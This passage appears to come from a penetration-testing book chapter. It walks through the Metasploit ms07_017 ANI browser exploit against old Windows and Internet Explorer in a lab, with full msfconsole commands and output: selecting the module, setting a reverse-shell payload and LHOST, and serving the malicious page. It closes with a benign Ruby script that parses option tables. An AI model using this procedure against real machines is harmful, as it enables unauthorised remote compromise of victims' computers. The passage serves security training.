windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
windows/browser/ms08_053_mediaencoder 2008-09-09 normal Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
Through the first one, you can compromise a Windows XP machine whose unpatched browser opens your page (the supported targets are listed below) and, for example, add a new directory on it. Delivery is over HTTP: running the exploit starts a web server inside Metasploit (SRVHOST and SRVPORT in the options), and from the Windows XP machine’s Internet Explorer you browse to that address. Attackers use the same method by e-mailing a link; when the user clicks it, the machine is compromised.
Your first step is to select that exploit.
//code of using exploit
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
Next you will try the show options command to see what options are available for you.
//code of showing options for that exploit
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >
Two columns of this table are extremely important here: Current Setting and Required. You can also see the targets by using the command show targets.
//code and output of showing targets
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show targets

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
   1   IE6 on Windows NT, 2000, XP, 2003 (all languages)
   2   IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)
   3   IE7 and Firefox on Windows Vista (all languages)
   4   Firefox on Windows XP (English)
   5   Firefox on Windows 2003 (English)
From this output you can see which browsers are vulnerable and which Windows versions are exposed; several versions of Internet Explorer and Firefox are listed.
Now that you have seen the options, you will choose the necessary payload. Before that, ask Metasploit to show all the payloads that are compatible with this exploit.
//code of showing payloads
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show payloads

Compatible Payloads
===================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   generic/custom                                               normal  Custom Payload
   generic/debug_trap                                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                           normal  Generic x86 Tight Loop
   windows/dllinject/bind_hidden_ipknock_tcp                    normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   windows/dllinject/bind_hidden_tcp                            normal  Reflective DLL Injection, Hidden Bind TCP Stager
   windows/dllinject/bind_ipv6_tcp                              normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   windows/dllinject/bind_ipv6_tcp_uuid                         normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/dllinject/bind_nonx_tcp                              normal  Reflective DLL Injection, Bind TCP Stager
This table shows all the payloads you can use with this exploit.
You have already selected the exploit and seen its options and targets; now you set the payload this way.
//code of setting payload
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
Again, you can use show options to see what options are available for you, which is why I issued the show options command right after setting the payload.
Now, let’s look at the output in detail. This is important because you need to know which settings are required and which are not.
//output of showing options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.

Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
There is now a second table in the terminal, the payload options, and you can see which settings are required. Everything is set except LHOST, the local listen address. Even the exploit target has been chosen by Metasploit: “(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista.”
You need to set LHOST by issuing the necessary command and then issue show options again to check that everything has been set properly.
//code of setting localhost and showing options
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
I checked my Kali Linux IP address and set LHOST to it, so that when the targeted machine opens that IP address in its browser it gets compromised. The output confirms that everything is okay.
//output of show-options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.

Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address
   LPORT     4444             yes       The listen port

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
Now that LHOST is set, you can safely issue the final command, exploit.
//code and output of final exploit command
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.0.2.15:4444
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.0.2.15:80/
[*] Server started.
As the server on the Kali Linux guest starts, any Windows NT, 2000, XP, 2003, or Vista machine from the target list will be compromised if someone opens the IE browser on it and types 10.0.2.15.
This is partly a spoofing technique, where targeted machines are asked to click a malicious link. Now, as a penetration tester, you are in a position to show your clients why they should immediately upgrade old versions of Windows.
Unfortunately, in today’s world many computers still use old Windows versions, which have a lot of vulnerabilities, as the Metasploit exploits covered in this chapter make evident.
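As an added example (not code from the book or from Metasploit itself), here is a small Ruby script that reads the show options output the walkthrough relies on and reports every required option that is still blank, which is exactly the state LHOST was in before set LHOST. SAMPLE_OUTPUT is a constructed, abridged copy of that output, and the parser assumes the column layout msfconsole prints.

```ruby
# Added example, not from the book: parse msfconsole "show options" output and list
# every Required option whose Current Setting is blank (LHOST before "set LHOST").
# Constructed sample in the layout msfconsole prints (abridged from the chapter).
SAMPLE_OUTPUT = <<~TXT
  Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     SRVHOST  0.0.0.0          yes       The local host to listen on
     SSLCert                   no        Path to a custom SSL certificate
     URIPATH  /                yes       The URI to use.

  Payload options (windows/shell_reverse_tcp):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     EXITFUNC process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST                     yes       The listen address
     LPORT    4444             yes       The listen port
TXT

# Returns { "Module options (...)" => [{name:, setting:, required:, description:}] }.
# Rows are sliced at the header's column offsets, so a blank Current Setting stays
# blank instead of shifting Required and Description one field to the left.
def parse_show_options(text)
  sections, current, cols = {}, nil, nil
  text.each_line do |raw|
    line = raw.chomp
    if (m = line.match(/\A(Module|Payload) options \((.+)\):\s*\z/))
      current, cols = "#{m[1]} options (#{m[2]})", nil
      sections[current] = []
    elsif current.nil? || line.strip.empty?
      cols = nil if current && !sections[current].empty?   # blank line ends a table
    elsif cols.nil?                                         # header row gives column offsets
      cols = ["Name", "Current Setting", "Required", "Description"].map { |h| line.index(h) } if line.include?("Current Setting")
    elsif line.strip !~ /\A-+(\s+-+)*\z/                    # skip the ---- underline
      fields = cols.each_with_index.map do |start, i|
        (cols[i + 1] ? line[start...cols[i + 1]] : line[start..-1]).to_s.strip
      end
      sections[current] << %i[name setting required description].zip(fields).to_h
    end
  end
  sections
end
# Required options still blank, e.g. ["Payload options (windows/shell_reverse_tcp): LHOST"].
def missing_required(sections)
  sections.flat_map do |section, opts|
    opts.select { |o| o[:required] == "yes" && o[:setting].empty? }.map { |o| "#{section}: #{o[:name]}" }
  end
end
puts missing_required(parse_show_options(SAMPLE_OUTPUT)) if __FILE__ == $PROGRAM_NAME
```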